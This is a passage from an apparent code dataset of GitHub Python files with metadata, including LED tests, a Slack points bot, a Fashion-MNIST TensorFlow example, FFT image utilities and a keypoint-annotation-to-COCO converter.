grid will not be affected and there will NOT be Error message\n # raised\n current_path = os.path.dirname(os.path.abspath(__file__))\n sys.argv = [\" \", \"--input\", current_path + \"/../data/input_test_007.txt\"]\n main()\n out,err = capsys.readouterr()\n assert \"5\" in out\n assert err == ''\n\ndef test_parse_args_008(capsys):\n # assertion_008:\n # \tVerify passing parameters with \"--input\" and string could\n # return the string successfully\n args = parse_args([\"--input\", \"url or filename\"])\n out,err = capsys.readouterr()\n assert args.input == 'url or filename'\n assert out == ''\n\ndef test_parse_args_009(capsys):\n # assertion_009:\n # \tVerify passing parameters with \"--opt\" and string could\n # NOT return the string successfully\n with pytest.raises(SystemExit):\n args = parse_args([\"--opt\", \"url or filename\"])\n out,err = capsys.readouterr()\n assert 'unrecognized arguments' in err\n", "repo_name": "naitao/LED", "sub_path": "tests/test_led.py", "file_name": "test_led.py", "file_ext": "py", "file_size_in_byte": 3539, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "led.led.get_response", "line_number": 17, "usage_type": "call"}, {"api_name": "led.led.get_response", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 32, "usage_type": "attribute"}, {"api_name": "led.led.main", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "led.led.main", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 53, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 54, "usage_type": "attribute"}, {"api_name": "led.led.main", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 63, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 64, "usage_type": "attribute"}, {"api_name": "led.led.main", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 77, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 78, "usage_type": "attribute"}, {"api_name": "led.led.main", "line_number": 79, "usage_type": "call"}, {"api_name": "led.led.parse_args", "line_number": 88, "usage_type": "call"}, {"api_name": "pytest.raises", "line_number": 97, "usage_type": "call"}, {"api_name": "led.led.parse_args", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "24576720672", "text": "import asyncio\nimport re\nfrom slack import RTMClient\nfrom slack import WebClient\nfrom slack.errors import SlackApiError\nimport threading\nfrom typing import Dict, List\n\nSLACK_TOKEN = open('slack_bot_token.txt').read().strip()\nMENTION_REGEX = \"^<@(|[WU].+?)>(.*)\"\n\nobjects = None\n\n# A cached list of users for id->name lookup\nusers_list = {}\n\n# The thread that the slack bot is running in\nthread = None\n\n# All of the available textures (set elsewhere)\ncheers_textures = []\n\n\ndef init(ursina_objects, textures:List[str]):\n global thread, objects, web_client, users_list, cheers_textures\n objects = ursina_objects\n cheers_textures = textures\n thread = SlackThread()\n thread.start()\n web_client = WebClient(SLACK_TOKEN)\n users = web_client.users_list()\n for member in users.data['members']:\n users_list[member['id']] = member\n return\n\n\ndef stop():\n global thread\n thread.stop()\n return\n\n\ndef user_info() -> Dict[str, str]:\n info = {}\n for user_id in users_list.keys():\n user = users_list[user_id]\n if 'real_name' in user and not user.get('deleted', True):\n info[user['name']] = user['real_name']\n return info\n\n\ndef help_text() -> str:\n s = 'Usage:\\n'\n s += '@Scrum Bot give @ \\n'\n s += 'Currently available cheers textures:\\n'\n for name in cheers_textures:\n s += f'- {name}\\n'\n return s\n\n\n# It does not look like there is a way to have this be a member of SlackThread, since 'self' will never\n# be passed to the method\n@RTMClient.run_on(event='message')\n@RTMClient.run_on(event='app_mention')\ndef handle_message(**payload):\n data = payload['data']\n web_client = payload['web_client']\n rtm_client = payload['rtm_client']\n text = data.get('text', '')\n give_matches = re.search(r'give\\s<@(?P\\S*)>\\s(?P[0-9]+)\\s*(?P\\S*)?', text)\n if give_matches:\n name_from = users_list[data['user']]['name']\n name_to = users_list[give_matches.group('give_to')]['name']\n points = int(give_matches.group('how_much'))\n texture = give_matches.group('texture')\n print(f'Giving {points} from {name_from} to {name_to}')\n objects['cheer_scoreboard'].transfer_points(name_from, name_to, points, texture=texture)\n elif 'help' in text:\n text = help_text()\n channel_id = data['channel']\n thread_ts = data['ts']\n user = data['user']\n\n try:\n response = web_client.chat_postMessage(\n channel=channel_id,\n text=text,\n thread_ts=thread_ts\n )\n except SlackApiError as e:\n # You will get a SlackApiError if \"ok\" is False\n assert e.response[\"ok\"] is False\n assert e.response[\"error\"] # str like 'invalid_auth', 'channel_not_found'\n print(f\"Got an error: {e.response['error']}\")\n\n return\n\n\nclass SlackThread(threading.Thread):\n def __init__(self):\n super().__init__()\n self._running = False\n self._bot_id = None\n self._loop = asyncio.new_event_loop()\n return\n\n def run(self):\n self._running = True\n asyncio.set_event_loop(self._loop)\n rtm_client = RTMClient(token=SLACK_TOKEN)\n # rtm_client.start() does not like being run in a thread,\n # so just do the parts of it that work in a thread manually....\n future = asyncio.ensure_future(rtm_client._connect_and_read(), loop=self._loop)\n self._loop.run_until_complete(future)\n return\n\n def stop(self) -> None:\n self._loop.stop()\n self.join()\n return\n", "repo_name": "carlsonmark/ursina_test", "sub_path": "ursina_test/slack_bot.py", "file_name": "slack_bot.py", "file_ext": "py", "file_size_in_byte": 3642, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.List", "line_number": 24, "usage_type": "name"}, {"api_name": "slack.WebClient", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 43, "usage_type": "name"}, {"api_name": "re.search", "line_number": 70, "usage_type": "call"}, {"api_name": "slack.errors.SlackApiError", "line_number": 90, "usage_type": "name"}, {"api_name": "slack.RTMClient.run_on", "line_number": 63, "usage_type": "call"}, {"api_name": "slack.RTMClient", "line_number": 63, "usage_type": "name"}, {"api_name": "slack.RTMClient.run_on", "line_number": 64, "usage_type": "call"}, {"api_name": "slack.RTMClient", "line_number": 64, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 99, "usage_type": "attribute"}, {"api_name": "asyncio.new_event_loop", "line_number": 104, "usage_type": "call"}, {"api_name": "asyncio.set_event_loop", "line_number": 109, "usage_type": "call"}, {"api_name": "slack.RTMClient", "line_number": 110, "usage_type": "call"}, {"api_name": "asyncio.ensure_future", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "15482774863", "text": "# TensorFlow and tf.keras\nimport tensorflow as tf\nfrom tensorflow.python.keras.models import Sequential\nfrom tensorflow.python.keras.callbacks import TensorBoard\nfrom tensorflow import keras\n\n\n# Helper libraries\nimport numpy as np\n\n# SET BACKEND\nimport matplotlib as mpl\nmpl.use('TkAgg')\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n# print(tf.__version__)\n\n# Descargamos los datos\nfashion_mnist = keras.datasets.fashion_mnist\n\n# Cargamos los valoes\n(train_images, train_labels), (test_images,\n test_labels) = fashion_mnist.load_data()\n\n# Definimos las clases\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\n\n# plt.figure()\n# plt.imshow(train_images[0])\n# plt.colorbar()\n# plt.grid(False)\n# plt.show()\n\n# Escalamos los valores a un rango entre 0-1\ntrain_images = train_images / 255.0\ntest_images = test_images / 255.0\n\n# plt.figure(figsize=(10, 10))\n# for i in range(25):\n# plt.subplot(5, 5, i+1)\n# plt.xticks([])\n# plt.yticks([])\n# plt.grid(False)\n# plt.imshow(train_images[i], cmap=plt.cm.binary)\n# plt.xlabel(class_names[train_labels[i]])\n# plt.show()\n\n\n# Construimos el modelo\nmodel = keras.Sequential([\n # La primera capa representa los 784 pixeles\n keras.layers.Flatten(input_shape=(28, 28)),\n # Esta capa esta compuesta por 128 neuronas\n keras.layers.Dense(128, activation=tf.nn.relu),\n # Ultima capa compuesta por 10 neuronas las caules representan una de las clases\n # retorna un arreglo compuesto por 10 probabilidades, cada una representa la\n # probabilidad de pertenecer auna de las neuronas la mas alta es la solucion\n keras.layers.Dense(10, activation=tf.nn.softmax)\n])\n\nmodel.compile(optimizer=tf.train.AdamOptimizer(), # Esta funcion describe como el modelo sera actualizado en funcion de la funcion\n # Esto define la forma en la que se buscara minimizar las salidas\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy']) # La metrica se basa en la precision que tenga cada clasificacion\n\ntensorboard = TensorBoard(\n log_dir=\"logs/{}\", histogram_freq=0, write_graph=True, write_images=True)\n\n# 5 Epocas\nmodel.fit(train_images, train_labels, epochs=5,\n verbose=1, callbacks=[tensorboard])\n\n# Calculamos la precision contra los datos correctos\ntest_loss, test_acc = model.evaluate(test_images, test_labels)\n\nprint('Test accuracy:', test_acc)\n\npredictions = model.predict(test_images)\n\n\ndef plot_image(i, predictions_array, true_label, img):\n predictions_array, true_label, img = predictions_array[i], true_label[i], img[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n\n plt.imshow(img, cmap=plt.cm.binary)\n\n predicted_label = np.argmax(predictions_array)\n if predicted_label == true_label:\n color = 'blue'\n else:\n color = 'red'\n\n plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\n 100*np.max(predictions_array),\n class_names[true_label]),\n color=color)\n\n\ndef plot_value_array(i, predictions_array, true_label):\n predictions_array, true_label = predictions_array[i], true_label[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n plt.ylim([0, 1])\n predicted_label = np.argmax(predictions_array)\n\n thisplot[predicted_label].set_color('red')\n thisplot[true_label].set_color('blue')\n\n\n# i = 0\n# plt.figure(figsize=(6, 3))\n# plt.subplot(1, 2, 1)\n# plot_image(i, predictions, test_labels, test_images)\n# plt.subplot(1, 2, 2)\n# plot_value_array(i, predictions, test_labels)\n# plt.show()\n\n\n# Plot the first X test images, their predicted label, and the true label\n# Color correct predictions in blue, incorrect predictions in red\n# num_rows = 5\n# num_cols = 3\n# num_images = num_rows*num_cols\n# plt.figure(figsize=(2*2*num_cols, 2*num_rows))\n# for i in range(num_images):\n# plt.subplot(num_rows, 2*num_cols, 2*i+1)\n# plot_image(i, predictions, test_labels, test_images)\n# plt.subplot(num_rows, 2*num_cols, 2*i+2)\n# plot_value_array(i, predictions, test_labels)\n# plt.show()\n\n\n# Grab an image from the test dataset\nimg = test_images[0]\n\nprint(img.shape)\n\n# Add the image to a batch where it's the only member.\nimg = (np.expand_dims(img, 0))\n\nprint(img.shape)\n\npredictions_single = model.predict(img)\n\nprint(predictions_single)\n\nplot_value_array(0, predictions_single, test_labels)\n_ = plt.xticks(range(10), class_names, rotation=45)\n\nnp.argmax(predictions_single[0])\n\nplt.show()\n", "repo_name": "Santiago-vdk/TensorFlowEjemplo", "sub_path": "ejemplo.py", "file_name": "ejemplo.py", "file_ext": "py", "file_size_in_byte": 4734, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "matplotlib.use", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.keras.datasets", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 21, "usage_type": "name"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 53, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 57, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 57, "usage_type": "name"}, {"api_name": "tensorflow.nn", "line_number": 57, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 61, "usage_type": "name"}, {"api_name": "tensorflow.nn", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 64, "usage_type": "attribute"}, {"api_name": "tensorflow.python.keras.callbacks.TensorBoard", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 90, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}]} +{"seq_id": "4854571235", "text": "# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.\r\n#\r\n# This work is licensed under the Creative Commons Attribution-NonCommercial\r\n# 4.0 International License. To view a copy of this license, visit\r\n# http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to\r\n# Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.\r\n\r\nimport os\r\nimport numpy as np\r\nimport pickle\r\nimport PIL.Image\r\nimport scipy.fft as fftpack\r\nimport ipdb\r\n\r\nimport dnnlib.submission.submit as submit\r\n\r\n# save_pkl, load_pkl are used by the mri code to save datasets\r\ndef save_pkl(obj, filename):\r\n with open(filename, 'wb') as file:\r\n pickle.dump(obj, file, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\ndef load_pkl(filename):\r\n with open(filename, 'rb') as file:\r\n return pickle.load(file)\r\n\r\n# save_snapshot, load_snapshot are used save/restore trained networks\r\ndef save_snapshot(submit_config, net, fname_postfix):\r\n dump_fname = os.path.join(submit_config.run_dir, \"network_%s.pickle\" % fname_postfix)\r\n with open(dump_fname, \"wb\") as f:\r\n pickle.dump(net, f)\r\n\r\ndef load_snapshot(fname):\r\n fname = os.path.join(submit.get_path_from_template(fname))\r\n with open(fname, \"rb\") as f:\r\n return pickle.load(f)\r\n\r\n\r\ndef invert_fft_re_im(img):\r\n ft = img\r\n\r\n img_real = ft[:, :, :ft.shape[2]//2]\r\n img_imag = ft[:, :, ft.shape[2]//2:]\r\n\r\n ft = img_real + 1j*img_imag\r\n #ft = np.exp(ft)\r\n\r\n real_img = fftpack.irfft2(ft, s=[ft.shape[1], ft.shape[2]*2])\r\n return real_img\r\n\r\ndef invert_fft_abs_ang(img):\r\n ft = img\r\n\r\n #img_abs = ft[:3, :, :]\r\n #img_ang = ft[3:, :, :] <-------- Color\r\n img_abs = ft[0, :, :]\r\n img_ang = ft[1, :, :]\r\n\r\n\r\n ft = img_abs * np.exp(1j*img_ang) \r\n #ft = np.exp(ft)\r\n ft = ft[None, :, :]\r\n\r\n real_img = fftpack.irfft2(ft, s=[ft.shape[1], ft.shape[2]*2])\r\n return real_img\r\n\r\ndef loop_fft(img, dir = 1):\r\n ft = fftpack.rfft2(img)\r\n #if dir == 1:\r\n # ft = np.exp(ft)\r\n #else:\r\n # ft = np.log(ft)\r\n out = fftpack.irfft2(ft)\r\n return out\r\n\r\ndef save_image(submit_config, img_t, filename):\r\n #img_t = invert_fft_abs_ang(img_t)\r\n #img_t = loop_fft(img_t)\r\n img_t = clip_to_uint8(img_t)\r\n t = img_t.transpose([1, 2, 0]) # [RGB, H, W] -> [H, W, RGB]\r\n if t.dtype in [np.float32, np.float64]:\r\n t = clip_to_uint8(t)\r\n else:\r\n assert t.dtype == np.uint8\r\n #PIL.Image.fromarray(t, 'RGB').save(os.path.join(submit_config.run_dir, filename)) #<--------- Color\r\n PIL.Image.fromarray(t.squeeze(), 'L').save(os.path.join(submit_config.run_dir, filename)) # <-------- B/W\r\n '''\r\n filename = os.path.join(submit_config.run_dir, filename)\r\n output = open(filename, 'wb')\r\n pickle.dump(img_t, output)\r\n output.close()\r\n '''\r\n \r\ndef save_clean_image(submit_config, img_t, filename):\r\n t = img_t.transpose([1, 2, 0]) # [RGB, H, W] -> [H, W, RGB]\r\n if t.dtype in [np.float32, np.float64]:\r\n t = clip_to_uint8(t)\r\n else:\r\n assert t.dtype == np.uint8\r\n #PIL.Image.fromarray(t, 'RGB').save(os.path.join(submit_config.run_dir, filename)) # <--------- Color\r\n PIL.Image.fromarray(t.squeeze(), 'L').save(os.path.join(submit_config.run_dir, filename)) # <-------- B/W\r\n\r\ndef clip_to_uint8(arr):\r\n return np.clip((arr + 0.5) * 255.0 + 0.5, 0, 255).astype(np.uint8)\r\n\r\ndef crop_np(img, x, y, w, h):\r\n return img[:, y:h, x:w]\r\n\r\n# Run an image through the network (apply reflect padding when needed\r\n# and crop back to original dimensions.)\r\ndef infer_image(net, img):\r\n #ipdb.set_trace()\r\n w = img.shape[2]\r\n h = img.shape[1]\r\n pw, ph = (w+31)//32*32-w, (h+31)//32*32-h\r\n padded_img = img\r\n if pw!=0 or ph!=0:\r\n padded_img = np.pad(img, ((0,0),(0,ph),(0,pw)), 'reflect')\r\n #inferred = net.run(np.expand_dims(padded_img, axis=0), width=(w+pw)*2, height=h+ph)\r\n inferred = net.run(np.expand_dims(padded_img, axis=0), width=(w+pw), height=h+ph) \r\n #return clip_to_uint8(crop_np(inferred[0], 0, 0, w, h))\r\n return crop_np(inferred[0], 0, 0, w, h)\r\n #return crop_np(inferred[0], 0, 0, w, h)\r\n\r\ndef create_circle(shape, radius):\r\n #ipdb.set_trace()\r\n out = np.ones(shape)\r\n for i in range(-radius, radius+1):\r\n for j in range(-radius, radius+1):\r\n if i**2 + j**2 <= radius**2:\r\n out[:, i, j] = 0\r\n return out\r\n\r\ndef remove_DC(img, rad):\r\n ft = fftpack.rfft2(img)\r\n low_pass = create_circle(ft.shape, rad)\r\n ft = ft * low_pass\r\n return fftpack.irfft2(ft, s = [img.shape[1], img.shape[2]])\r\n\r\ndef restore_DC(orig_img, img, rad):\r\n #ipdb.set_trace()\r\n orig_ft = fftpack.rfft2(orig_img)\r\n ft = fftpack.rfft2(img)\r\n low_pass = create_circle(ft.shape, rad)\r\n return fftpack.irfft2(ft + (1 - low_pass) * orig_ft, s = [img.shape[1], img.shape[2]])\r\n\r\n", "repo_name": "MegiDervishi/debluring_n2n", "sub_path": "noise2noise/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 4855, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pickle.dump", "line_number": 20, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "dnnlib.submission.submit.get_path_from_template", "line_number": 33, "usage_type": "call"}, {"api_name": "dnnlib.submission.submit", "line_number": 33, "usage_type": "name"}, {"api_name": "pickle.load", "line_number": 35, "usage_type": "call"}, {"api_name": "scipy.fft.irfft2", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 47, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 59, "usage_type": "call"}, {"api_name": "scipy.fft.irfft2", "line_number": 63, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 63, "usage_type": "name"}, {"api_name": "scipy.fft.rfft2", "line_number": 67, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 67, "usage_type": "name"}, {"api_name": "scipy.fft.irfft2", "line_number": 72, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 72, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 80, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 83, "usage_type": "attribute"}, {"api_name": "PIL.Image.Image.fromarray", "line_number": 85, "usage_type": "call"}, {"api_name": "PIL.Image.Image", "line_number": 85, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 85, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 98, "usage_type": "attribute"}, {"api_name": "PIL.Image.Image.fromarray", "line_number": 100, "usage_type": "call"}, {"api_name": "PIL.Image.Image", "line_number": 100, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 103, "usage_type": "attribute"}, {"api_name": "numpy.pad", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 126, "usage_type": "call"}, {"api_name": "scipy.fft.rfft2", "line_number": 134, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 134, "usage_type": "name"}, {"api_name": "scipy.fft.irfft2", "line_number": 137, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 137, "usage_type": "name"}, {"api_name": "scipy.fft.rfft2", "line_number": 141, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 141, "usage_type": "name"}, {"api_name": "scipy.fft.rfft2", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 142, "usage_type": "name"}, {"api_name": "scipy.fft.irfft2", "line_number": 144, "usage_type": "call"}, {"api_name": "scipy.fft", "line_number": 144, "usage_type": "name"}]} +{"seq_id": "32021906221", "text": "# _*_ coding:utf-8 _*_\n# Editor: ly\n# Time: 2021/1/8上午10:43\n# Filename: AIR_jsoner.py\n# IDE: PyCharm\n\nimport json\nimport tqdm\n\n# 源文件\npath_json = '/home/ly/Dataset/AIR/annotations/train_ori/pro_version_train.json'\npath_coco = '/home/ly/Dataset/AIR/annotations/train_ori/coco_version_train.json'\nsave = 'train_v1.json'\n\n# 打开源文件\nfile_pro = open(path_json, 'r')\nfile_coco = open(path_coco, 'r')\n\n'''对关键点信息 KPT 的处理'''\npro_all = json.load(file_pro)\n\n# 获取图像数量:\nsample_list_size = len(pro_all['_via_img_metadata'])\n\n# 获取图像名字:\nsample_name = list(pro_all['_via_img_metadata'].keys())\n\n# 获取关键点标签字典\n# (剔除了其中的mask和box标签)\nsample_cat = pro_all['_via_attributes']['region']['plane']['options']\n# cat_table = list(sample_cat.keys())[:-2]\ncat_table = list(sample_cat.keys())[:-1]\n\n'''关键点信息与关键点表的映射关系'''\n# 一幅图片 i 中的关键点 j 位于: ['meta'][i]['regions'][j],\n# 具体信息位于: ['regions'][j]['shape_attr']['cx/cy']\n# 对应标签位于: ['regions'][j]['region_attr']['plane']\n'''由于信息中有mask 和 box信息, 需要经过cat_table表来剔除'''\n# 或者直接将['region_attr']['plane']转为整型?\n\n# samp_id: 图片名在 metadata 列表中的序号\n\n# 建立关键点存储数组\nJOINT_NUM = 9\nsample_KPT = [0] * sample_list_size\nfor samp_id in range(sample_list_size):\n sample_KPT[samp_id] = {}\n sample_KPT[samp_id]['kpt'] = [0] * (JOINT_NUM * 3)\n sample_KPT[samp_id]['num'] = 0\n\n# 遍历via_pro中各图片, 生成kpt字典\nfor samp_id in range(sample_list_size):\n # if samp_id == 174 or samp_id == 410 or samp_id == 414 or samp_id == 545 or samp_id == 588 or samp_id == 821:\n # continue\n # 从名字中分离出id, 其中,图片id = 标签id = 名字的整型\n img_name_id = int(sample_name[samp_id][:12])\n\n # 获得图中关键点标注信息{一个列表}\n ori_kpt_list = pro_all['_via_img_metadata'][sample_name[samp_id]]['regions']\n cnt = 0\n # print(\"空点debug...:\")\n # print(img_name_id)\n # print(\"\\n\")\n # 遍历各点\n for i in range(len(ori_kpt_list)):\n # 获得第i个关键点的种类编号, 为了删除原始资料中的 MASK 和 BOX 信息\n cati = ori_kpt_list[i]['region_attributes']['plane']\n\n # 遍历关键点种类表: 查找第i个点的种类\n tmp = [j for j in cat_table if j in cati]\n if len(tmp) == 1:\n kpt_id = int(cati)\n\n sample_KPT[img_name_id]['kpt'][kpt_id * 3] = ori_kpt_list[i]['shape_attributes']['cx']\n sample_KPT[img_name_id]['kpt'][kpt_id * 3 + 1] = ori_kpt_list[i]['shape_attributes']['cy']\n sample_KPT[img_name_id]['kpt'][kpt_id * 3 + 2] = 2\n cnt = cnt + 1\n\n # 保存图片中关键点数量\n sample_KPT[img_name_id]['num'] = cnt\n\n'''至此, kpt 与 num_kpt 部分提取完毕'''\n\n'''对 掩膜, box 和 area信息的处理'''\njson_coco = json.load(file_coco)\ncoco_WH = json_coco['images']\ncoco_SAB = json_coco['annotations']\n\n# sample_SAB = [0] * (len(coco_SAB) // 2)\n# for samp_id in range(len(coco_SAB) // 2):\nsample_SAB = [0] * (len(coco_SAB))\nfor samp_id in range(len(coco_SAB)):\n sample_SAB[samp_id] = {}\n sample_SAB[samp_id]['seg'] = []\n sample_SAB[samp_id]['area'] = 0\n sample_SAB[samp_id]['bbox'] = 0\nfor i in range(len(coco_SAB)):\n real_img_id = int(coco_SAB[i]['image_id'])\n if coco_SAB[i]['category_id'] == 10:\n sample_SAB[real_img_id]['seg'].append(coco_SAB[i]['segmentation'])\n sample_SAB[real_img_id]['area'] += coco_SAB[i]['area']\n sample_SAB[real_img_id]['bbox'] = coco_SAB[i]['bbox']\n\n'''对 宽高 的处理'''\nsample_WH = [0] * (len(coco_WH))\nfor samp_id in range(len(coco_WH)):\n sample_WH[samp_id] = {}\n sample_WH[samp_id]['width'] = 0\n sample_WH[samp_id]['height'] = 0\nfor img in coco_WH:\n sample_WH[img['id']]['width'] = img['width']\n sample_WH[img['id']]['height'] = img['height']\n\n'''coco.json文件生成'''\n# sample_SAB\n# sample_KPT\n# 列表id 即为:\nprint(\"writting...\\n\")\ninfo = '{\"info\":{\"year\":2020,\"version\":\"1\",\"description\":\"Airplane Dataset(imitated COCO2017)\",\"contributor\":\"Annotation tools: VIA, Resource web: VJshi, Scholiast: IOE_lab5_ly\",\"url\":\"https://github.com/Maushawkin/\",\"date_created\":\"Wed Dec 25 2020 00:00:01 GMT+0800\"},\"images\":['\nz = open(save, 'a+')\nz.write(info)\nz.close()\n\n'''writing images'''\nfor i in tqdm.tqdm(range(sample_list_size)):\n '''require two parameters:[id, name, width, height]'''\n temp_id = int(sample_name[i][0:12])\n img_par = [temp_id, sample_name[i][0:16], sample_WH[temp_id]['width'], sample_WH[temp_id]['height']]\n buff_img = 